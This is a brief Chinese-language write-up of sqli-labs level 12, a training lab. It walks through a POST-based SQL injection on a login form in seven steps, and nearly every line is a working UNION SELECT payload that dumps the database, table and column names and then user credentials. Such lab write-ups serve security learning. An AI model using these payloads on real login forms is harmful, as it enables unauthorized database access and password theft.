sqli-labs第十二关_sqli-labs第12关

 
 

post传值，跟十一关差不多。

可以用burpsuite来做：

就是正常的sql注入流程

第一步，判断闭合方式

uname=1")b&passwd=&submit=Submit

uname=1")#b&passwd=&submit=Submit 

 由此判断为，双引号反括号闭合；

第二步，判断字段数

uname=" or "1" = "1&passwd=1 ")order by 3#&submit=Submit

uname=1&passwd=1 ")order by 3#&submit=S

uname=" or "1" = "1&passwd=1 ")order by 2#&submit=Submit

uname=1&passwd=1 ")order by 2#&submit=Submit

 第三步，判断注入点

uname=1"or"1"="1&passwd=1 ")union select 1,2#&submit=Submit 

 第四步，报数据库名

uname=1"or"1"="1&passwd=1 ")union select 1,database()#&submit=Submit

第五步，爆表名

uname=1"or"1"="1&passwd=1 ")union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security')#&submit=Submit

 第六步，爆字段名

uname=1"or"1"="1&passwd=1 ")union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users')#&submit=Submit

 第七步，爆数据

uname=1"or"1"="1&passwd=1 ")union select 1,(select group_concat(id,username,password)from users)#&submit=Submit

至此结束吧！

对了，也可以用报错注入，下次再写。